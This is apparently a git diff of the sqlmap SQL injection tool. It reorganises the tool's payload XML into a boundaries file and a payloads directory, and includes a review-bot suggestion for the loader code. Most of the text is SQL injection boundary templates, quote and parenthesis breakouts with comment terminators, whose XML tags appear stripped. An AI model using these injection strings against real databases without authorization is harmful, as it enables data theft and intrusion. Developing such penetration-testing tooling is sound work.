diff --git a/lib/core/common.py b/lib/core/common.py
index 11f9c9fc1..5b9ea7afd 100755
--- a/lib/core/common.py
+++ b/lib/core/common.py
@@ -1085,6 +1085,7 @@ def setPaths():
paths.SQLMAP_UDF_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "udf")
paths.SQLMAP_XML_PATH = os.path.join(paths.SQLMAP_ROOT_PATH, "xml")
paths.SQLMAP_XML_BANNER_PATH = os.path.join(paths.SQLMAP_XML_PATH, "banner")
+ paths.SQLMAP_XML_PAYLOADS_PATH = os.path.join(paths.SQLMAP_XML_PATH, "payloads")
_ = os.path.join(os.path.expanduser("~"), ".sqlmap")
paths.SQLMAP_OUTPUT_PATH = getUnicode(paths.get("SQLMAP_OUTPUT_PATH", os.path.join(_, "output")), encoding=sys.getfilesystemencoding())
@@ -1105,7 +1106,7 @@ def setPaths():
paths.USER_AGENTS = os.path.join(paths.SQLMAP_TXT_PATH, "user-agents.txt")
paths.WORDLIST = os.path.join(paths.SQLMAP_TXT_PATH, "wordlist.zip")
paths.ERRORS_XML = os.path.join(paths.SQLMAP_XML_PATH, "errors.xml")
- paths.PAYLOADS_XML = os.path.join(paths.SQLMAP_XML_PATH, "payloads.xml")
+ paths.BOUNDARIES_XML = os.path.join(paths.SQLMAP_XML_PATH, "boundaries.xml")
paths.LIVE_TESTS_XML = os.path.join(paths.SQLMAP_XML_PATH, "livetests.xml")
paths.QUERIES_XML = os.path.join(paths.SQLMAP_XML_PATH, "queries.xml")
paths.GENERIC_XML = os.path.join(paths.SQLMAP_XML_BANNER_PATH, "generic.xml")
diff --git a/lib/core/option.py b/lib/core/option.py
index 6288f52ee..9c40e7198 100644
--- a/lib/core/option.py
+++ b/lib/core/option.py
@@ -130,6 +130,7 @@ from lib.core.settings import WEBSCARAB_SPLITTER
from lib.core.threads import getCurrentThreadData
from lib.core.update import update
from lib.parse.configfile import configFileParser
+from lib.parse.payloads import loadBoundaries
from lib.parse.payloads import loadPayloads
from lib.parse.sitemap import parseSitemap
from lib.request.basic import checkCharEncoding
@@ -2400,6 +2401,7 @@ def init():
_setWriteFile()
_setMetasploit()
_setDBMSAuthentication()
+ loadBoundaries()
loadPayloads()
_setPrefixSuffix()
update()
diff --git a/lib/parse/payloads.py b/lib/parse/payloads.py
index f41db9dfd..84e6b0a82 100644
--- a/lib/parse/payloads.py
+++ b/lib/parse/payloads.py
@@ -5,6 +5,8 @@ Copyright (c) 2006-2015 sqlmap developers (http://sqlmap.org/)
See the file 'doc/COPYING' for copying permission
"""
+import os
+
from xml.etree import ElementTree as et
from lib.core.data import conf
@@ -67,14 +69,32 @@ def parseXmlNode(node):
conf.tests.append(test)
-def loadPayloads():
+def loadBoundaries():
try:
- doc = et.parse(paths.PAYLOADS_XML)
+ doc = et.parse(paths.BOUNDARIES_XML)
except Exception, ex:
errMsg = "something seems to be wrong with "
- errMsg += "the file '%s' ('%s'). Please make " % (paths.PAYLOADS_XML, ex)
+ errMsg += "the file '%s' ('%s'). Please make " % (paths.BOUNDARIES_XML, ex)
errMsg += "sure that you haven't made any changes to it"
raise SqlmapInstallationException, errMsg
root = doc.getroot()
parseXmlNode(root)
+
+def loadPayloads():
+ payloadFiles = os.listdir(paths.SQLMAP_XML_PAYLOADS_PATH)
+ payloadFiles.sort()
+
+ for payloadFile in payloadFiles:
+ payloadFilePath = os.path.join(paths.SQLMAP_XML_PAYLOADS_PATH, payloadFile)
+
+ try:
+ doc = et.parse(payloadFilePath)
+ except Exception, ex:
+ errMsg = "something seems to be wrong with "
+ errMsg += "the file '%s' ('%s'). Please make " % (payloadFilePath, ex)
+ errMsg += "sure that you haven't made any changes to it"
+ raise SqlmapInstallationException, errMsg
+
+ root = doc.getroot()
+ parseXmlNode(root)
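Review bot: loadPayloads passes every entry returned by os.listdir straight to et.parse, so any stray non-XML entry in the payloads directory (an editor backup, a hidden file, a subdirectory) aborts start-up with SqlmapInstallationException, while a missing or unreadable directory surfaces as a raw OSError from os.listdir rather than the install-time error that a parse failure gets. Filtering the listing to `.xml` names and routing the listdir failure through the same error path keeps both cases on one code path and also hardens the sorted `00_` ordering against unrelated files. The error-message assembly is now duplicated verbatim between loadBoundaries and loadPayloads; a small helper taking the path and the exception would remove that. loadPayloads ends on the last line of the hunk.
```python
def loadPayloads():
    try:
        payloadFiles = [_ for _ in os.listdir(paths.SQLMAP_XML_PAYLOADS_PATH) if _.endswith(".xml")]
    except OSError, ex:
        errMsg = "something seems to be wrong with "
        errMsg += "the directory '%s' ('%s'). Please make " % (paths.SQLMAP_XML_PAYLOADS_PATH, ex)
        errMsg += "sure that you haven't made any changes to it"
        raise SqlmapInstallationException, errMsg

    payloadFiles.sort()
    # ... unchanged: per-file et.parse loop and parseXmlNode call ...
```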
diff --git a/xml/boundaries.xml b/xml/boundaries.xml
new file mode 100644
index 000000000..0da7a6036
--- /dev/null
+++ b/xml/boundaries.xml
@@ -0,0 +1,519 @@
+
+
+
+
+
+
+
+ 3
+ 1
+ 1,2
+ 1
+ )
+
+
+
+
+ 4
+ 1
+ 1,2
+ 2
+ ')
+
+
+
+
+ 3
+ 1,2,3
+ 1,2
+ 2
+ '
+
+
+
+
+ 5
+ 1
+ 1,2
+ 4
+ "
+
+
+
+
+
+
+ 1
+ 1
+ 1,2
+ 1
+ )
+ AND ([RANDNUM]=[RANDNUM]
+
+
+
+ 2
+ 1
+ 1,2
+ 1
+ ))
+ AND (([RANDNUM]=[RANDNUM]
+
+
+
+ 3
+ 1
+ 1,2
+ 1
+ )))
+ AND ((([RANDNUM]=[RANDNUM]
+
+
+
+ 1
+ 0
+ 1,2,3
+ 1
+
+
+
+
+
+ 1
+ 1
+ 1,2
+ 2
+ ')
+ AND ('[RANDSTR]'='[RANDSTR]
+
+
+
+ 2
+ 1
+ 1,2
+ 2
+ '))
+ AND (('[RANDSTR]'='[RANDSTR]
+
+
+
+ 3
+ 1
+ 1,2
+ 2
+ ')))
+ AND ((('[RANDSTR]'='[RANDSTR]
+
+
+
+ 1
+ 1
+ 1,2
+ 2
+ '
+ AND '[RANDSTR]'='[RANDSTR]
+
+
+
+ 2
+ 1
+ 1,2
+ 3
+ ')
+ AND ('[RANDSTR]' LIKE '[RANDSTR]
+
+
+
+ 3
+ 1
+ 1,2
+ 3
+ '))
+ AND (('[RANDSTR]' LIKE '[RANDSTR]
+
+
+
+ 4
+ 1
+ 1,2
+ 3
+ ')))
+ AND ((('[RANDSTR]' LIKE '[RANDSTR]
+
+
+
+ 2
+ 1
+ 1,2
+ 3
+ '
+ AND '[RANDSTR]' LIKE '[RANDSTR]
+
+
+
+ 2
+ 1
+ 1,2
+ 4
+ ")
+ AND ("[RANDSTR]"="[RANDSTR]
+
+
+
+ 3
+ 1
+ 1,2
+ 4
+ "))
+ AND (("[RANDSTR]"="[RANDSTR]
+
+
+
+ 4
+ 1
+ 1,2
+ 4
+ ")))
+ AND ((("[RANDSTR]"="[RANDSTR]
+
+
+
+ 2
+ 1
+ 1,2
+ 4
+ "
+ AND "[RANDSTR]"="[RANDSTR]
+
+
+
+ 3
+ 1
+ 1,2
+ 5
+ ")
+ AND ("[RANDSTR]" LIKE "[RANDSTR]
+
+
+
+ 4
+ 1
+ 1,2
+ 5
+ "))
+ AND (("[RANDSTR]" LIKE "[RANDSTR]
+
+
+
+ 5
+ 1
+ 1,2
+ 5
+ ")))
+ AND ((("[RANDSTR]" LIKE "[RANDSTR]
+
+
+
+ 3
+ 1
+ 1,2
+ 5
+ "
+ AND "[RANDSTR]" LIKE "[RANDSTR]
+
+
+
+ 2
+ 1
+ 1,2
+ 2
+ %')
+ AND ('%'='
+
+
+
+ 3
+ 1
+ 1,2
+ 2
+ %'))
+ AND (('%'='
+
+
+
+ 4
+ 1
+ 1,2
+ 2
+ %')))
+ AND ((('%'='
+
+
+
+ 1
+ 1
+ 1,2
+ 2
+ %'
+ AND '%'='
+
+
+
+ 5
+ 1
+ 1,2
+ 2
+ %00')
+ AND ('[RANDSTR]'='[RANDSTR]
+
+
+
+ 4
+ 1
+ 1,2
+ 2
+ %00'
+ AND '[RANDSTR]'='[RANDSTR]
+
+
+
+ 1
+ 1
+ 1,2
+ 1
+
+ -- [RANDSTR]
+
+
+
+
+
+ 5
+ 1
+ 1,2
+ 2
+ ') WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+ 5
+ 1
+ 1,2
+ 2
+ ") WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+ 4
+ 1
+ 1,2
+ 1
+ ) WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+ 4
+ 1
+ 1,2
+ 2
+ ' WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+ 5
+ 1
+ 1,2
+ 4
+ " WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+ 4
+ 1
+ 1,2
+ 1
+ WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+
+
+ 5
+ 1
+ 1,2
+ 2
+ ')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+ 5
+ 1
+ 1,2
+ 2
+ ")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+ 5
+ 1
+ 1,2
+ 1
+ )) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+ 4
+ 1
+ 1,2
+ 2
+ ') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+ 5
+ 1
+ 1,2
+ 4
+ ") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+ 4
+ 1
+ 1,2
+ 1
+ ) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
+ --
+
+
+
+
+
+ 5
+ 1
+ 1
+ 2
+ '||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]
+ )||'
+
+
+
+ 5
+ 1
+ 1
+ 2
+ '||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
+ )||'
+
+
+
+ 5
+ 1
+ 1
+ 1
+ '+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
+ )+'
+
+
+
+ 5
+ 1
+ 1
+ 2
+ '+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
+ )+'
+
+
+
+
+
+ 4
+ 1
+ 1
+ 2
+ ' IN BOOLEAN MODE)
+ #
+
+
+
diff --git a/xml/payloads.xml b/xml/payloads/00_payloads.xml
similarity index 91%
rename from xml/payloads.xml
rename to xml/payloads/00_payloads.xml
index 5fb16dc72..6c3abadd7 100644
--- a/xml/payloads.xml
+++ b/xml/payloads/00_payloads.xml
@@ -1,66 +1,6 @@
-
-
- 3
- 1
- 1,2
- 1
- )
-
-
-
-
- 4
- 1
- 1,2
- 2
- ')
-
-
-
-
- 3
- 1,2,3
- 1,2
- 2
- '
-
-
-
-
- 5
- 1
- 1,2
- 4
- "
-
-
-
-
-
-
- 1
- 1
- 1,2
- 1
- )
- AND ([RANDNUM]=[RANDNUM]
-
-
-
- 2
- 1
- 1,2
- 1
- ))
- AND (([RANDNUM]=[RANDNUM]
-
-
-
- 3
- 1
- 1,2
- 1
- )))
- AND ((([RANDNUM]=[RANDNUM]
-
-
-
- 1
- 0
- 1,2,3
- 1
-
-
-
-
-
- 1
- 1
- 1,2
- 2
- ')
- AND ('[RANDSTR]'='[RANDSTR]
-
-
-
- 2
- 1
- 1,2
- 2
- '))
- AND (('[RANDSTR]'='[RANDSTR]
-
-
-
- 3
- 1
- 1,2
- 2
- ')))
- AND ((('[RANDSTR]'='[RANDSTR]
-
-
-
- 1
- 1
- 1,2
- 2
- '
- AND '[RANDSTR]'='[RANDSTR]
-
-
-
- 2
- 1
- 1,2
- 3
- ')
- AND ('[RANDSTR]' LIKE '[RANDSTR]
-
-
-
- 3
- 1
- 1,2
- 3
- '))
- AND (('[RANDSTR]' LIKE '[RANDSTR]
-
-
-
- 4
- 1
- 1,2
- 3
- ')))
- AND ((('[RANDSTR]' LIKE '[RANDSTR]
-
-
-
- 2
- 1
- 1,2
- 3
- '
- AND '[RANDSTR]' LIKE '[RANDSTR]
-
-
-
- 2
- 1
- 1,2
- 4
- ")
- AND ("[RANDSTR]"="[RANDSTR]
-
-
-
- 3
- 1
- 1,2
- 4
- "))
- AND (("[RANDSTR]"="[RANDSTR]
-
-
-
- 4
- 1
- 1,2
- 4
- ")))
- AND ((("[RANDSTR]"="[RANDSTR]
-
-
-
- 2
- 1
- 1,2
- 4
- "
- AND "[RANDSTR]"="[RANDSTR]
-
-
-
- 3
- 1
- 1,2
- 5
- ")
- AND ("[RANDSTR]" LIKE "[RANDSTR]
-
-
-
- 4
- 1
- 1,2
- 5
- "))
- AND (("[RANDSTR]" LIKE "[RANDSTR]
-
-
-
- 5
- 1
- 1,2
- 5
- ")))
- AND ((("[RANDSTR]" LIKE "[RANDSTR]
-
-
-
- 3
- 1
- 1,2
- 5
- "
- AND "[RANDSTR]" LIKE "[RANDSTR]
-
-
-
- 2
- 1
- 1,2
- 2
- %')
- AND ('%'='
-
-
-
- 3
- 1
- 1,2
- 2
- %'))
- AND (('%'='
-
-
-
- 4
- 1
- 1,2
- 2
- %')))
- AND ((('%'='
-
-
-
- 1
- 1
- 1,2
- 2
- %'
- AND '%'='
-
-
-
- 5
- 1
- 1,2
- 2
- %00')
- AND ('[RANDSTR]'='[RANDSTR]
-
-
-
- 4
- 1
- 1,2
- 2
- %00'
- AND '[RANDSTR]'='[RANDSTR]
-
-
-
- 1
- 1
- 1,2
- 1
-
- -- [RANDSTR]
-
-
-
-
-
-
- 5
- 1
- 1,2
- 2
- ') WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
- 5
- 1
- 1,2
- 2
- ") WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
- 4
- 1
- 1,2
- 1
- ) WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
- 4
- 1
- 1,2
- 2
- ' WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
- 5
- 1
- 1,2
- 4
- " WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
- 4
- 1
- 1,2
- 1
- WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
-
-
- 5
- 1
- 1,2
- 2
- ')) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
- 5
- 1
- 1,2
- 2
- ")) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
- 5
- 1
- 1,2
- 1
- )) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
- 4
- 1
- 1,2
- 2
- ') AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
- 5
- 1
- 1,2
- 4
- ") AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
- 4
- 1
- 1,2
- 1
- ) AS [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
- --
-
-
-
-
-
- 5
- 1
- 1
- 2
- '||(SELECT '[RANDSTR]' FROM DUAL WHERE [RANDNUM]=[RANDNUM]
- )||'
-
-
-
- 5
- 1
- 1
- 2
- '||(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
- )||'
-
-
-
- 5
- 1
- 1
- 1
- '+(SELECT [RANDSTR] WHERE [RANDNUM]=[RANDNUM]
- )+'
-
-
-
- 5
- 1
- 1
- 2
- '+(SELECT '[RANDSTR]' WHERE [RANDNUM]=[RANDNUM]
- )+'
-
-
-
-
-
- 4
- 1
- 1
- 2
- ' IN BOOLEAN MODE)
- #
-
-
-
AND boolean-based blind - WHERE or HAVING clause